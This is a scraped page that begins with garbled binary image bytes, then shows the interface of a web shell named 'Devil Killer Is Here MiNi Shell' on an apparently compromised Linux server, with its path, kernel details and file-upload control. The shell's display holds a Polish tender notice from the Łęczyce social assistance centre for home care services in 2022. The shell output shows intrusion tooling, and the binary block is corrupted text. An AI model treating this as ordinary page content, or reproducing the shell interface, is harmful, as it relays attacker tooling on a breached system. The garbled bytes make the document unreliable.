JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220224/0006774101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Świadczenie usług opiekuńczych w miejscu zamieszkania dla podopiecznych Ośrodka Pomocy w Łęczycach w okresie od 01 kwietnia 2022 r. do 31 grudnia 2022 r.&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Ośrodek Pomocy Społecznej w Łęczycach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 192592827</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Długa 53</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łęczyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-218</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 678-92-10</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@opsleczyce.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.opsleczyce.nv.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Świadczenie usług opiekuńczych w miejscu zamieszkania dla podopiecznych Ośrodka Pomocy w Łęczycach w okresie od 01 kwietnia 2022 r. do 31 grudnia 2022 r.&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93d5e5ff-956f-11ec-94c8-de8df8ed9da1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00067741</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-02-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039937/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług opiekuńczych w miejscu zamieszkania dla podopiecznych Ośrodka Pomocy Społecznej w Łęczycach w okresie od 01 kwietnia 2022 r. do 31 grudnia 2022 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-93d5e5ff-956f-11ec-94c8-de8df8ed9da1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl, https://epuap.gov.pl/wps/portal, sekretarariat@opsleczyce.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja pomiędzy Zamawiającym, a wykonawcami będzie możliwa w formie elektronicznej, co pociąga za sobą konieczność posiadania kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego. <br/>2. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiający, a Wykonawcami odbywa się w języku polskim przy użyciu środków komunikacji elektronicznej, tj.: <br/>1)	miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl, oraz (za wyjątkiem składania ofert i dokumentów składanych wraz z ofertą)<br/>2)	ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal<br/>3)	poczty elektronicznej: sekretarariat@opsleczyce.pl.<br/>3. Oficjalny adres Elektronicznej Skrytki Pocztowej ESP /opsleczyce/SkrytkaESP<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz komunikacji”.<br/>5. W formularzu oferty wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym może być prowadzona korespondencja związana z postępowaniem.<br/>6. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz „Formularz komunikacji”.<br/>7. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w „Regulaminie korzystania z systemu miniPortal”, „Instrukcja użytkowania systemu miniPortal” oraz „Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP)”.<br/>8. Zamawiający nie przewiduje komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej. <br/>9. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w „Regulaminie korzystania z systemu miniPortal”, „Instrukcja użytkowania systemu miniPortal” oraz „Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP)”. <br/>10. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularz do komunikacji” wynosi 150 MB.<br/>11. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ROZPORZĄDZENIA PARLAMENTU EUROPEJSKIEGO I RADY (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (RODO) informujemy, że:<br/>1. Administrator Twoich danych: Kierownik Ośrodka Pomocy Społecznej m w imieniu: Ośrodek Pomocy Społecznej w Łęczycach, ul. Długa 53, 84-218 Łęczyce .<br/>2. Dane kontaktowe: z Administratorem można się skontaktować: <br/>1) osobiście lub na adres poczty elektronicznej: sekretariat@opsleczyce.pl, <br/>2) telefonicznie: 58 678 92 10 <br/>3) pisemnie: ul. Długa 53, 84-218 Łęczyce <br/>3. Inspektor Ochrony Danych: W Ośrodku Pomocy Społecznej w Łęczycach został wyznaczony Inspektor Ochrony Danych, z którym można się skontaktować poprzez adres poczty elektronicznej: iodo@leczyce.pl lub pisemnie (na adres siedziby Ośrodka Pomocy Społecznej w Łęczycach). Z Inspektorem Ochrony Danych można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych. <br/>4. Cele przetwarzania, podstawa prawna przetwarzania, czas przechowywania poszczególnych kategorii danych: <br/>Dane będą przetwarzane przez Ośrodek Pomocy Społecznej w Łęczycach wyłącznie w celu: 1) wypełniania obowiązków prawnych - w tej sytuacji podanie danych jest obowiązkowe (na podstawie art. 6 ust. 1 lit. c - ciążących na Ośrodku Pomocy Społecznej w szczególności zadań wynikających z:<br/>a) Ustawa z dnia 11 września 2019 r. – Prawo zamówień publicznych; <br/>w celu związanym z postępowaniem o udzielenie zamówienia nr OPS.272.1.2022.UO<br/>Dane będą przechowywane przez okres 4 lat od zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>5. Odbiorcy danych: Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o ustawę z dnia 11 września 2019 r. – Prawo zamówień publicznych (tj. Dz. U. z 2021 r. poz. 1129 ze zm.), dalej „ustawa Pzp”.<br/>6. Prawa osoby, której dane dotyczą: Posiada Pani/Pan:	<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; <br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*; <br/> c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**; <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>7. Nie przysługuje Pani/Panu: <br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; <br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; <br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/><br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu postępowania oraz jego załączników; <br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OPS.272.1.2022.OU</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług opiekuńczych w ramach realizacji zadań własnych gminy na podstawie art. 50 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz.U z 2021 r., poz. 2268 ze zm.), zwanych dalej „Usługami” dla podopiecznych Ośrodka Pomocy Społecznej w Łęczycach w miejscu zamieszkania podopiecznego w okresie od 01 kwietnia 2022 r. do 31 grudnia 2022r.<br/><br/>2. Zakres usług opiekuńczych obejmuje: <br/>1)	pomoc w zaspokajaniu codziennych potrzeb życiowych, w szczególności pomoc w samoobsłudze, pomoc w ubieraniu się, dokonywanie zakupów, przygotowywanie posiłków (w tym dietetycznych), przynoszenie gotowych posiłków ze stołówki, karmienie, przynoszenie węgla i palenie w piecu, pranie bielizny osobistej, odzieży , odnoszenie rzeczy do prania do punktów pralniczych i ich odbiór, utrzymywanie w czystości pomieszczeń osoby objętej pomocą (w tym sprzątanie po wykonywanych pracach domowych), mycie okien u osób samotnych (4 razy w roku), wzywanie lekarza w sytuacjach wymagających jego interwencji, zamawianie wizyt lekarskich, realizację recept, podawanie leków, załatwianie niezbędnych spraw urzędowych, wykonywanie wszelkich innych czynności niezbędnych do zaspakajania codziennych potrzeb życiowych.<br/>2) opiekę higieniczną, obejmującą zapewnienie higieny osobistej i higieny pomieszczeń w szczególności pomoc w wykonywaniu czynności higieny osobistej (w tym toalecie porannej oraz myciu głowy), pomoc przy załatwianiu potrzeb fizjologicznych (zmiana pieluch), dbanie o higienę paznokci, zmiana pozycji ciała osoby mającej trudności z poruszaniem się bądź nie poruszającej się, zmiana bielizny pościelowej, wykonywanie wszelkich innych czynności niezbędnych do zapewnienia higieny osobistej i higieny pomieszczeń.<br/>3) zaleconą przez lekarza pielęgnację, w szczególności dbanie o toaletę przeciwodleżynową, zmianę pozycji ciała, podawanie leków, iniekcję insuliny, mierzenie temperatury, tętna, ciśnienia, zakładanie kompresów i okładów, zmiana opatrunków, zamawianie wizyt lekarskich, wykonywanie wszelkich innych czynności niezbędnych do prowadzenia prawidłowej pielęgnacji, w razie potrzeby wykonywanie wszelkich czynności mających na celu ochronę zdrowia bądź ratowanie życia. <br/>4) zapewnienie kontaktów z otoczeniem, obejmujące pomoc w komunikowaniu się z innymi osobami oraz pomoc w poruszaniu się, w szczególności pomoc w dojściu do lekarzy, na zabiegi itp. oraz w powrocie do domu. Towarzyszenie na spacerach, pomoc w utrzymaniu kontaktu z rodziną i otoczeniem, czytanie prasy i książek, pisanie listów, wykonywanie wszelkich innych czynności niezbędnych do zapewnienia kontaktów z otoczeniem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311100-3 - Usługi opieki społecznej dla osób starszych</p> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-04-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejszą ofertą będzie oferta, która przedstawi najkorzystniejszy bilans ceny i kryteriów poza cenowych – doświadczenie wykonawcy.<br/><br/>Punkty będą wyliczane zgodnie z niżej podanymi zasadami, przyjmując, że 1 % = 1 punkt.<br/><br/>1. Kryterium „Cena” w PLN: <br/>C = Cmin∶Cbad x 60 % x 100 = ….. pkt<br/>C - liczba uzyskanych punktów za kryterium ceny (ocenianej oferty)<br/>C min - najniższa cena ofertowa<br/>C bad - cena oferty badanej<br/>Przy ocenie ofert porównuje się wartość ofert brutto. W tym kryterium można otrzymać maksymalnie 60 punktów. <br/>Uzyskana z wyliczenia ilość punktów zostanie ostatecznie ustalona z dokładnością do drugiego miejsca po przecinku z zachowaniem zasady zaokrągleń matematycznych.<br/>Zamawiający wybiera ofertę przedstawiająca najniższą cenę.<br/><br/>2. Kryterium „Doświadczenie Wykonawcy” <br/>Wykonawca wskazuje liczbę miesięcy doświadczenia w pracy wykonywanej w zakresie świadczenia usług opiekuńczych. <br/>W kryterium tym można uzyskać maksymalnie 40 punktów. Wykonawca otrzyma odpowiednią liczbę punktów na podstawie danych zawartych w Formularzy ofertowym w punkcie odnoszącym się do doświadczenia (D).<br/>Ocena punktowa kryterium „Doświadczenie Wykonawcy” dokonana zostanie z następującymi warunkami:<br/>a) do 18 miesięcy doświadczenia – 0 pkt;<br/>b) doświadczenie w granicach 19 - 24 miesięcy – 15 pkt; <br/>c) doświadczenie w granicach 25 - 30 miesięcy – 30 pkt; <br/>d) doświadczenie powyżej 31 miesięcy – 40 pkt.<br/><br/>3. Oferta przedstawiająca najkorzystniejszy bilans punktów w kryterium cena (C) oraz doświadczenie Wykonawcy (D), czyli oferta, która otrzyma najwyższą liczbę punktów obliczoną według wzoru:<br/>N = C + D<br/>Zostanie wybrana jako najkorzystniejsza, gdzie:<br/>N – oznacza łączną sumę punktów otrzymanych w kryterium cena (C), kryterium doświadczenie Wykonawcy (D).<br/>Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Wykonawcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale VII SWZ.<br/>2. Wykonawca składa oświadczenie o spełnieniu warunków udziału w postępowaniu stanowiące załącznik nr 4 do niniejszego SWZ. <br/>3. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia się wymagań;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia się wymagań;<br/>3) sytuacji ekonomicznej i finansowej: Zamawiający nie stawia się wymagań;<br/>4) zdolności technicznej lub zawodowej: Zamawiający stawia wymagania, które dotyczą: <br/>a) Doświadczenia:<br/>O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy wykonywali usługi opiekuńcze należycie w sposób ciągły przez okres 12 miesięcy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – co najmniej 1 usługi (na podstawie jednej umowy) na realizację usług opiekuńczych przez okres minimum 12 miesięcy, przy średniej ilości godzin w miesiącu 900. <br/>Ocena spełnienia warunku będzie dokonana na podstawie złożonych przez Wykonawcę zaświadczeń/referencji o wykonanych lub wykonywanych usługach z należytą starannością oraz na podstawie złożonego przez Wykonawcę oświadczenia zgodnie z załącznikiem nr 5 do SWZ – na zasadzie spełnia /nie spełnia.<br/>b) Osób zdolnych do wykonania zamówienia:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że dysponują co najmniej 4 osobami do realizacji zamówienia, z których każda musi:<br/>a) być osobą niekaralną, sprawną fizycznie i intelektualnie, zdolną do wykonania prac fizycznych, posiadającą umiejętność utrzymywania prawidłowych kontaktów interpersonalnych.<br/>b) być osobą dyspozycyjną na czas trwania umowy. <br/>Ocena spełnienia warunku będzie dokonana na podstawie złożonego przez Wykonawcę wykazu osób z podaniem imienia i nazwiska, informacji o podstawie do dysponowania tą osobą oraz informacji o doświadczeniu opiekuna zgodnie z załącznikiem nr 6 do SWZ wraz z załączonymi pisemnymi oświadczeniami wskazanych osób do wykonywania usług o dyspozycyjności na czas trwania umowy oraz o posiadanym doświadczeniu w wykonywaniu usług opiekuńczych na zasadzie spełnia /nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe (aktualne na dzień złożenia) składane na wezwanie Zamawiającego (zgodnie z art. 274 ust. 1 ustawy Pzp ) przez wykonawcę, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni.<br/>1. W celu potwierdzenia przez Wykonawcę braku podstaw wykluczenia z postępowania, Zamawiający żąda złożenia :<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi 